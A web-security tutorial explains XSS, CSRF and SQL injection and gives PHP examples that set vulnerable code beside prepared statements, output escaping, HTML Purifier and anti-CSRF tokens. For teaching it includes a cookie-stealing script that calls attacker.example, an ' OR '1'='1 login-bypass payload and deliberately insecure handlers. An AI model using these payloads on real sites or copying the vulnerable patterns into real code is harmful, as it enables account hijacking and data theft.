Some of the web attack techniques that attackers most commonly use to steal information or corrupt data on a system are:
1.1. XSS (Cross-Site Scripting)

XSS lets an attacker inject malicious script (JavaScript, or in older browsers VBScript, ActiveX or Flash) or HTML into a dynamic page, so that the script runs in the victim's browser and collects data. Unlike SQL injection it does not target the system's database; it targets the user directly. A few lines of injected script can read the session cookie (unless the cookie is marked HttpOnly, in which case the script can still act as the user from inside the page), and with that cookie the attacker hijacks the account without ever needing the password. Two main variants:
- Reflected XSS: the payload is carried in the request itself and echoed straight back in the response, so the attacker has to get the victim to open a crafted link such as:
  `http://www.example.com/search?query=<script>alert('XSS was found !');</script>`
- Stored XSS: a destructive variant with far heavier consequences. It occurs when attacker-supplied data is saved on the server through some feature of the site and is from then on rendered as normal content in every visitor's browser; no crafted link is needed, and a user who merely views the affected page is hit. The injected code sits in the database as a blog comment, a message, a forum post or a visitor-log entry. Example: if the "about me" field of the registration form accepts XSS code and the site does not validate its input, everyone who visits that member's profile page is exploited.
Figure: XSS model
It follows that Stored XSS is far more dangerous than Reflected XSS: everyone who uses the web application can be affected, not only the users who can be tricked into following a crafted link. And if the victim is an administrator, the attacker may gain control of the whole site.
1.2. CSRF
CSRF is most practical for someone who knows the target system: a former developer, or anyone who can read its code because it is open source or otherwise published, and who therefore knows exactly which URL triggers which action. The attacker sends the admin a message containing a link to such an action. When the admin opens it while logged in, the browser issues the request and automatically attaches the site's session cookie, so the server carries out the action with the admin's privileges; the attacker never needs to see the cookie. If mail is not an option but the admin is known to be logged in, the attacker can host a page of their own that contains the malicious request (for example a hidden, auto-submitting form) and send its link over Yahoo Messenger or any other channel; the moment the admin visits it, the requests fire. Either way the attacker performs an unauthorized request through the victim's own browser and session.
1.3. SQL Injection

You already know how a website works: when a request arrives from the client, the server-side language, PHP for example, reads the values out of that request. The language itself cannot tell whether those values contain malicious SQL, so guarding against it falls entirely on the programmer's experience.
– Suppose I have a login page with two fields, username and password, and my login handler pastes them straight into the SQL query string. If `' OR '1'='1` is entered in both the user and password boxes, the statement becomes:

`SELECT * FROM T_USERS WHERE username='' OR '1'='1' AND password='' OR '1'='1';`

A payload such as `' OR 1=1` that does not close the quote it opened would leave the statement with an unbalanced quote, which is why an attacker either balances it as above or comments out the remainder with `-- `. Because AND binds tighter than OR, the WHERE clause is true for every row. Running the query returns the whole user table, so with sloppy code that treats any non-empty result as success, the attacker is logged in at once, usually as the first row, which is often the administrator.

This is only a textbook example; in practice attackers have many more tricks. Nevertheless, SQL injection is a technique we can fully defend against.
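The login handler described above, written out as an added example (it is not code from the original article): the query built by string concatenation, the `' OR '1'='1` payload run against it, and the same login done with a prepared statement. It also applies the integer cast and prepared-statement advice that section 2.3 below gives. It uses an in-memory SQLite database through PDO so it runs offline; the table and column names follow the article's query, the two user rows are made up, and the plaintext password column is kept only to mirror the article (real code stores `password_hash()` output and checks it with `password_verify()`).

```php
<?php
// Added example, not from the original article.
// Vulnerable login (string concatenation) next to the parameterized fix.
declare(strict_types=1);

// Constructed test database: in-memory SQLite, two made-up users.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE T_USERS (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO T_USERS (username, password) VALUES ('admin', 'S3cret!'), ('alice', 'hunter2')");

// Vulnerable: user input is pasted straight into the SQL text.
// With $user = $pass = "' OR '1'='1" the WHERE clause is true for every row.
function loginVulnerable(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT * FROM T_USERS WHERE username='$user' AND password='$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;   // "sloppy" code: first row wins
}

// Hardened: the query text is fixed at prepare time, values travel separately
// as parameters, so quotes in the input can never change the statement.
function loginSafe(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare('SELECT * FROM T_USERS WHERE username = :u AND password = :p');
    $stmt->execute([':u' => $user, ':p' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['username'] : null;
}

// Numeric parameter: cast to int before use (section 2.3), so "2 OR 1=1" becomes 2,
// and still bind it rather than interpolate it.
function userById(PDO $db, string $rawId): ?string
{
    $id = (int) $rawId;
    $stmt = $db->prepare('SELECT username FROM T_USERS WHERE id = ?');
    $stmt->execute([$id]);
    $name = $stmt->fetchColumn();
    return $name === false ? null : $name;
}

$payload = "' OR '1'='1";
echo "vulnerable: ", loginVulnerable($db, $payload, $payload) ?? 'denied', "\n"; // admin (first row)
echo "safe:       ", loginSafe($db, $payload, $payload) ?? 'denied', "\n";       // denied
echo "safe/valid: ", loginSafe($db, 'alice', 'hunter2') ?? 'denied', "\n";       // alice
echo "by id:      ", userById($db, '2 OR 1=1') ?? 'none', "\n";                  // alice (id 2)
```

Run it with `php login.php`; the first line shows the injected login succeeding as `admin`, the second shows the same payload rejected once the values are bound as parameters.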
2. Prevention

2.1. XSS
The best defence against XSS follows the rule: validate input, escape output. There are plenty of filtering libraries to choose from for this. Escaping means encoding user data at the point where it is written into the page, with `htmlspecialchars()` for HTML body and attribute contexts (JavaScript and URL contexts need their own encoders). Where the site must accept user-supplied HTML, for example from a rich-text editor, you can use a PHP library that filters HTML to stop attackers posting XSS payloads through your site: HTML Purifier. It is a very capable library for deploying in your own code against XSS. Built in an object-oriented style, it is easy to use: after including the library file, create an instance of the HTMLPurifier object and call its purify() method to filter the data. Escaping and purifying complement, rather than replace, marking the session cookie HttpOnly and sending a Content-Security-Policy header.
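As an added example covering both the "about me" stored-XSS scenario of section 1.1 and the escape-output and HTML Purifier advice above (this is not code from the original article or from the HTML Purifier project), the profile text is rendered three ways. The profile text is a constructed payload; the Composer `vendor/autoload.php` path for HTML Purifier is an assumption, and the rich-text branch falls back to escaping when the library is not installed.

```php
<?php
// Added example, not from the original article.
// Stored profile text rendered raw (vulnerable), escaped, and purified.
declare(strict_types=1);

// Constructed attacker input, as it would sit in the database after registration.
$bio = 'Hi! <script>document.location="http://attacker.example/?c="+document.cookie</script>'
     . ' <b>bold</b> <a href="javascript:alert(1)">me</a>';

// 1. Vulnerable: stored text is echoed as-is; the script runs in every visitor's browser.
function renderVulnerable(string $bio): string
{
    return "<div class=\"bio\">$bio</div>";
}

// 2. Plain-text field: escape at output. ENT_QUOTES also covers attribute contexts;
//    the charset is given explicitly so malformed multibyte input cannot smuggle a '<'.
function renderEscaped(string $bio): string
{
    $safe = htmlspecialchars($bio, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<div class=\"bio\">$safe</div>";
}

// 3. Rich-text field: keep harmless markup, drop scripts, event handlers and
//    javascript: URLs with HTML Purifier's whitelist. Never falls back to raw output.
function renderRichText(string $bio): string
{
    if (!class_exists('HTMLPurifier')) {
        $autoload = __DIR__ . '/vendor/autoload.php';   // assumed Composer layout
        if (is_file($autoload)) {
            require_once $autoload;
        }
    }
    if (!class_exists('HTMLPurifier')) {
        return renderEscaped($bio);                      // library absent: escape instead
    }
    $config = HTMLPurifier_Config::createDefault();
    $config->set('HTML.Allowed', 'b,i,a[href],p,br');    // explicit element/attribute whitelist
    $config->set('URI.AllowedSchemes', ['http' => true, 'https' => true]);
    $purifier = new HTMLPurifier($config);
    return '<div class="bio">' . $purifier->purify($bio) . '</div>';
}

echo renderVulnerable($bio), "\n";   // script tag reaches the browser
echo renderEscaped($bio), "\n";      // &lt;script&gt;... shown as text, nothing executes
echo renderRichText($bio), "\n";     // <b>bold</b> kept, script and javascript: href removed
```

With the library installed the third line keeps `<b>bold</b>` and the link text but drops the `<script>` element and the `javascript:` href; without it, the output equals the escaped form.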
2.2. CSRF
To prevent this attack we usually address two groups: the coders and the end users.
– For end users:
– Avoid staying logged in to the system while corresponding with strangers over other channels or reading e-mail of unknown origin; a forged request only works while you hold a valid session. Log out as soon as you are done.
– Log in from a dedicated machine that nobody else can touch.
– Change passwords regularly and choose hard-to-guess ones containing special characters, since password-cracking tools are widespread. (This limits the damage from a stolen account but does not by itself stop CSRF, which never needs the password.)
– For coders:
– Generate a random anti-CSRF token per session (or per form), store it server-side, embed it in every state-changing form, reject any request whose token is missing or does not match, and give the token a limited lifetime. Mark the session cookie SameSite=Lax or Strict so browsers withhold it on cross-site requests.
– Never use GET for requests that change the database; a GET can be triggered by a plain `<img>` tag.
– Validate all user-supplied data strictly.
– Obscure admin URLs raise the bar only slightly: as section 1.2 notes, the attacker may have the source code, so do not rely on this alone.
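The synchronizer-token defence from the coder list above, applied to the admin action that section 1.2 describes being forged, as an added example (not code from the original article). The action name, the field names and the session array are assumptions, and the requests at the bottom are constructed to stand in for a browser.

```php
<?php
// Added example, not from the original article.
// Per-session anti-CSRF token with expiry, POST-only handler, constructed requests.
declare(strict_types=1);

const CSRF_TTL = 1800; // token lifetime in seconds (30 minutes), assumed value

// Issue (or reuse) a token bound to this session; call when rendering a form.
function csrfToken(array &$session): string
{
    if (empty($session['csrf']) || $session['csrf']['exp'] < time()) {
        $session['csrf'] = [
            'value' => bin2hex(random_bytes(32)),   // 256 bits from the CSPRNG
            'exp'   => time() + CSRF_TTL,
        ];
    }
    return $session['csrf']['value'];
}

// Validate a submitted token: must exist, must not be expired, constant-time compare.
function csrfValid(array $session, ?string $submitted): bool
{
    if ($submitted === null || empty($session['csrf'])) {
        return false;
    }
    if ($session['csrf']['exp'] < time()) {
        return false;
    }
    return hash_equals($session['csrf']['value'], $submitted);
}

// The protected handler. Rejects GET (no state changes over GET) and any POST
// whose token is missing, stale or wrong. The delete itself is simulated.
function deleteUserHandler(array &$session, string $method, array $post): string
{
    if ($method !== 'POST') {
        return '405 use POST';
    }
    if (!csrfValid($session, $post['csrf'] ?? null)) {
        return '403 bad CSRF token';
    }
    $id = (int) ($post['id'] ?? 0);
    return "200 deleted user $id";
}

// The form as the legitimate admin page renders it: token in a hidden field.
function deleteUserForm(array &$session, int $id): string
{
    $t = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return "<form method=\"post\" action=\"/admin/delete-user\">"
         . "<input type=\"hidden\" name=\"csrf\" value=\"$t\">"
         . "<input type=\"hidden\" name=\"id\" value=\"$id\">"
         . "<button>Delete</button></form>";
}

// --- constructed walk-through -----------------------------------------------
// In a real app, before session_start(): session_set_cookie_params(
//     ['samesite' => 'Lax', 'httponly' => true, 'secure' => true]);
$session = ['user' => 'admin'];            // the admin is logged in

// Attacker's page (section 1.2) auto-submits a form it crafted; it holds no token.
echo deleteUserHandler($session, 'GET',  ['id' => '7']), "\n";                                 // 405
echo deleteUserHandler($session, 'POST', ['id' => '7']), "\n";                                 // 403
echo deleteUserHandler($session, 'POST', ['id' => '7', 'csrf' => str_repeat('a', 64)]), "\n"; // 403 (guess)

// Legitimate flow: the admin loaded the real form, which carries the session's token.
$form = deleteUserForm($session, 7);
preg_match('/name="csrf" value="([0-9a-f]+)"/', $form, $m);
echo deleteUserHandler($session, 'POST', ['id' => '7', 'csrf' => $m[1]]), "\n";               // 200
```

The token is unreadable to the attacker's page because the same-origin policy stops it from reading the admin's form, and a guessed value fails the `hash_equals` check; the expiry bounds how long a token leaked through a log or referrer stays usable.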
2.3. SQL Injection

- Cast numeric input to INT before using it (e.g. `intval()` or `(int)`).
- URL rewriting can make injection points harder to spot but does not remove them; the rewritten values still reach the query and need the handling below.
- Use `sprintf` with typed format specifiers and `mysql_real_escape_string` to fix the data type of each value in the query. Note that the `mysql_*` extension this function belongs to was removed in PHP 7.0; in current PHP use prepared statements with PDO or mysqli, which keep data out of the query text altogether.

These are the three techniques attackers most commonly use to break into a system. Developers should know them in order to prevent them, and testers should know them in order to find the flaws first, so that attackers have a hard time getting in.